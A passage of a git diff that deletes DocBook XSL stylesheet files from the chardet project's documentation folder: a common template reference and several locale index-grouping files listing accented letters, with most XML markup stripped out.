- ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/common.xsl b/chardet/docs/docbook/xsl/common/common.xsl deleted file mode 100644 index 3c28117..0000000 --- a/chardet/docs/docbook/xsl/common/common.xsl +++ /dev/null @@ -1,1658 +0,0 @@ - - - - - - - - -$Id: common.xsl,v 1.1.1.1 2004/06/22 02:08:39 f8dy Exp $ - -Walsh -Norman -19992000 -Norman Walsh - - -Common Template Reference - - -
    Introduction - -This is technical reference documentation for the DocBook XSL -Stylesheets; it documents (some of) the parameters, templates, and -other elements of the stylesheets. - -This is not intended to be user documentation. -It is provided for developers writing customization layers for the -stylesheets, and for anyone who's interested in how it -works. - -Although I am trying to be thorough, this documentation is known -to be incomplete. Don't forget to read the source, too :-) -
    -
    - -
    - - - - - - - - - - - -Tests if a given node is a component-level element - - -This template returns '1' if the specified node is a component -(Chapter, Appendix, etc.), and '0' otherwise. - - - - -node - -The node which is to be tested. - - - - - - -This template returns '1' if the specified node is a component -(Chapter, Appendix, etc.), and '0' otherwise. - - - - - - - 1 - 0 - - - - - - -Tests if a given node is a section-level element - - -This template returns '1' if the specified node is a section -(Section, Sect1, Sect2, etc.), and '0' otherwise. - - - - -node - -The node which is to be tested. - - - - - - -This template returns '1' if the specified node is a section -(Section, Sect1, Sect2, etc.), and '0' otherwise. - - - - - - - 1 - 0 - - - - - - -Returns the hierarchical level of a section. - - -This template calculates the hierarchical level of a section. -The element sect1 is at level 1, sect2 is -at level 2, etc. - -Recursive sections are calculated down to the fifth level. - - - - -node - -The section node for which the level should be calculated. -Defaults to the context node. - - - - - - -The section level, 1, 2, etc. - - - - - - - - 1 - 2 - 3 - 4 - 5 - - - 6 - 5 - 4 - 3 - 2 - 1 - - - - - - - - - - 2 - 3 - 4 - 5 - 5 - - - 5 - 4 - 3 - 2 - - - 1 - - - 1 - - - - -Returns the hierarchical level of a QandASet. - - -This template calculates the hierarchical level of a QandASet. - - - - -The level, 1, 2, etc. - - - - - - - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - 1 - 1 - 2 - 3 - - - 5 - 4 - 3 - 2 - 1 - - - - - - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - question - answer - qandadiv - qandaset - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [FAMILY Given] - - - - - - - - - , - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -[ -] -{ -} - - -[ -] -... - - - | -4pi - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Selects and processes an appropriate media object from a list - - -This template takes a list of media objects (usually the -children of a mediaobject or inlinemediaobject) and processes -the "right" object. - -This template relies on a template named -"select.mediaobject.index" to determine which object -in the list is appropriate. - -If no acceptable object is located, nothing happens. - - - - -olist - -The node list of potential objects to examine. - - - - - - -Calls <xsl:apply-templates> on the selected object. - - - - - - - - - - - - - - - - - - - - - -Selects the position of the appropriate media object from a list - - -This template takes a list of media objects (usually the -children of a mediaobject or inlinemediaobject) and determines -the "right" object. It returns the position of that object -to be used by the calling template. - -If the parameter use.role.for.mediaobject -is nonzero, then it first checks for an object with -a role attribute of the appropriate value. It takes the first -of those. Otherwise, it takes the first acceptable object -through a recursive pass through the list. - -This template relies on a template named "is.acceptable.mediaobject" -to determine if a given object is an acceptable graphic. The semantics -of media objects is that the first acceptable graphic should be used. - - -If no acceptable object is located, no index is returned. - - - - -olist - -The node list of potential objects to examine. - - -count - -The position in the list currently being considered by the -recursive process. - - - - - - -Returns the position in the original list of the selected object. - - - - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - - - - 0 - - - - 0 - - - - 1 - - - - 0 - - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Returns '1' if the specified media object is recognized. - - -This template examines a media object and returns '1' if the -object is recognized as a graphic. - - - - -object - -The media object to consider. - - - - - - -0 or 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - 1 - 1 - 1 - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - . - - - - - - - - - - - - . - - - - - - - - - - - - - - - - -Warn users about references to non-unique IDs - -If passed an ID in linkend, -check.id.unique prints -a warning message to the user if either the ID does not exist or -the ID is not unique. - - - - - - - - - - - - Error: no ID for constraint linkend: - - . - - - - - - - Warning: multiple "IDs" for constraint linkend: - - . - - - - - - -Warn users about incorrectly typed references - -If passed an ID in linkend, -check.idref.targets makes sure that the element -pointed to by the link is one of the elements listed in -element-list and warns the user otherwise. - - - - - - - - - - - - - - Error: linkend ( - - ) points to " - - " not (one of): - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Unexpected context in procedure.step.numeration: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - - - - 2 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - loweralpha - lowerroman - upperalpha - upperroman - arabic - arabic - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - circle - square - disc - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Print a set of years with collapsed ranges - - -This template prints a list of year elements with consecutive -years printed as a range. In other words: - -1992 -1993 -1994]]> - -is printed 1992-1994, whereas: - -1992 -1994]]> - -is printed 1992, 1994. - -This template assumes that all the year elements contain only -decimal year numbers, that the elements are sorted in increasing -numerical order, that there are no duplicates, and that all the years -are expressed in full century+year -(1999 not 99) notation. - - - - -years - -The initial set of year elements. - - -print.ranges - -If non-zero, multi-year ranges are collapsed. If zero, all years -are printed discretely. - - -single.year.ranges - -If non-zero, two consecutive years will be printed as a range, -otherwise, they will be printed discretely. In other words, a single -year range is 1991-1992 but discretely it's -1991, 1992. - - - - - - -This template returns the formatted list of years. - - - - - - - - - - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - , - - - - , - - , - - - - - - - , - - - - - - - - - - - - - - - - -Search in a table for the "best" match for the node - - -This template searches in a table for the value that most-closely -(in the typical best-match sense of XSLT) matches the current (element) -node location. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - diff --git a/chardet/docs/docbook/xsl/common/cs.xml b/chardet/docs/docbook/xsl/common/cs.xml deleted file mode 100644 index 5275d36..0000000 --- a/chardet/docs/docbook/xsl/common/cs.xml +++ /dev/null @@ -1,624 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symboly - A - a - Á - á - B - b - C - c - Č - č - D - d - Ď - ď - E - e - É - é - Ě - ě - Ë - ë - F - f - G - g - H - h - Ch - ch - cH - CH - I - i - Í - í - J - j - K - k - L - l - M - m - N - n - Ň - ň - O - o - Ó - ó - Ö - ö - P - p - Q - q - R - r - Ř - ř - S - s - Š - š - T - t - Ť - ť - U - u - Ú - ú - Ů - ů - Ü - ü - V - v - W - w - X - x - Y - y - Ý - ý - Z - z - Ž - ž - - diff --git a/chardet/docs/docbook/xsl/common/da.xml b/chardet/docs/docbook/xsl/common/da.xml deleted file mode 100644 index 81f8328..0000000 --- a/chardet/docs/docbook/xsl/common/da.xml +++ /dev/null @@ -1,588 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - A - a - B - b - C - c - D - d - E - e - F - f - G - g - H - h - I - i - J - j - K - k - L - l - M - m - N - n - O - o - P - p - Q - q - R - r - S - s - T - t - U - u - V - v - W - w - X - x - Y - y - Z - z - Æ - æ - Ø - ø - Å - å - - diff --git a/chardet/docs/docbook/xsl/common/de.xml b/chardet/docs/docbook/xsl/common/de.xml deleted file mode 100644 index 90fbc03..0000000 --- a/chardet/docs/docbook/xsl/common/de.xml +++ /dev/null @@ -1,590 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbole - A - a - Ä - ä - B - b - C - c - D - d - E - e - F - f - G - g - H - h - I - i - J - j - K - k - L - l - M - m - N - n - O - o - Ö - ö - P - p - Q - q - R - r - S - s - T - t - U - u - Ü - ü - V - v - W - w - X - x - Y - y - Z - z - - diff --git a/chardet/docs/docbook/xsl/common/el.xml b/chardet/docs/docbook/xsl/common/el.xml deleted file mode 100644 index cb74b5f..0000000 --- a/chardet/docs/docbook/xsl/common/el.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/en.xml b/chardet/docs/docbook/xsl/common/en.xml deleted file mode 100644 index eda66d5..0000000 --- a/chardet/docs/docbook/xsl/common/en.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/es.xml b/chardet/docs/docbook/xsl/common/es.xml deleted file mode 100644 index 8e9568d..0000000 --- a/chardet/docs/docbook/xsl/common/es.xml +++ /dev/null @@ -1,600 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Símbolos - A - a - á - Á - B - b - C - c - CH - ch - D - d - E - e - É - é - F - f - G - g - H - h - I - i - Í - í - J - j - K - k - L - l - LL - ll - M - m - N - n - Ñ - ñ - O - o - Ó - ó - P - p - Q - q - R - r - S - s - T - t - U - u - Ú - ú - V - v - W - w - X - x - Y - y - Z - z - - diff --git a/chardet/docs/docbook/xsl/common/et.xml b/chardet/docs/docbook/xsl/common/et.xml deleted file mode 100644 index c187ab9..0000000 --- a/chardet/docs/docbook/xsl/common/et.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/eu.xml b/chardet/docs/docbook/xsl/common/eu.xml deleted file mode 100644 index e35bb90..0000000 --- a/chardet/docs/docbook/xsl/common/eu.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 